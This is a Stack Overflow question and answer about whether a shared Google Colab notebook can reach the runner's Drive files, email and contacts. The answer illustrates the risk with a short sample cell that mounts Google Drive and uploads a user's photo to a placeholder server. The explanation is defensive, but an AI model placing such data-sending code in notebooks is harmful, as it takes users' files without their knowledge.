'Is Google Colab notebook sharing my Drive data with the notebook author?

I am following an online tutorial and the tutor has provided a Google Colab notebook as a supplement. But whenever I run any of the cells from the notebook, I am getting a warning message as follows:

Warning: This notebook was not authored by Google. This notebook was authored by [email protected]. It may request access to your data stored with Google such as files, emails and contacts. Please review the source code and contact the creator of this notebook at [email protected] with any additional questions. Cancel Button. Run Anyway Button.

  1. Does this mean that the author of Colab notebook can access my data such as files, emails, and contacts?

  2. If yes, is there any way to block the author from accessing my data?

  3. Warning message says that it may request access. Does it mean that if/when the notebook wants to access the data, it will ask me for the permission via a popup?

  4. Warning message asks me to review the source code. But what exactly should I be looking for, in the source code?

I tried googling but didn't get any answer.

Thanks a lot in advance.



Solution 1:[1]

TL;DR: Unless you explicitly allow access to your Google account, you can safely execute the notebook (except GCE VMs, which you might have already granted authority to access your data).

  1. Does this mean that the author of Colab notebook can access my data such as files, emails, and contacts?

Depending on the content of the notebook, yes.

Running a harmless snippet like print("hello, world!") does not send any data to the author; after all, Colab is just an environment that runs Jupyter notebooks. However, if the cell contains some malicous code instead, an attacker may be able to access your data.

Colab has a set of features that enables Python scripts to access the user's data, namely their Google Drive's content. There are other APIs that expose your information, including your Gmail address and (theoretically) Contacts. The attacker could use these features to retrieve your data, then send them to their server with, say, the requests library.

## If the user runs this cell, an image in their Google Drive will be 
## sent to my server. Needs the user's authentication, though.
from google import drive

drive.mount("/gdrive")  # a popup asking for permission will appear
with open("/gdrive/Google Photos/DSC_0001.JPG", "rb") as f:
    requests.post("https://0.0.0.0/upload/", files={"files": f}, data={})
  1. If yes, is there any way to block the author from accessing my data?
  2. Warning message says that it may request access. Does it mean that if/when the notebook wants to access the data, it will ask me for the permission via a popup?

When you connect your notebook to a Google-hosted VM (by clicking "connect" on the top left of the window), the machine is not connected to your Google account; it requires your action for the notebook to access your data, either via popup window or token (in CLI). For example, when your notebook tries to mount your Google Drive to the VM (with drive.mount()), you are asked whether to allow it in a popup.

Therefore, unless you give explicit permission to access data linked to your account, the attacker cannot retrieve it.

By the way, connecting to a GCE VM is a different story. Depending on how you set up your machine, you might be already logged in to your Google account on the VM. In this case you must be very cautious, since running one malicious cell is enough to compromise your information.

  1. Warning message asks me to review the source code. But what exactly should I be looking for, in the source code?
  1. If a cell contains some code that requests you to log in to your Google account, you should proceed with caution.
  2. If you do need to authorize some level of access, the standard security checklist applies; consider if the author is trustworthy, and examine the notebook thoroughly, looking for any code that retrieves your data and send them to servers outside. But if the code is complex this might not be obvious (and if I was the attacker, I would not put it somewhere easy to find).

Sources

This article follows the attribution requirements of Stack Overflow and is licensed under CC BY-SA 3.0.

Source: Stack Overflow

Solution Source
Solution 1 yumemio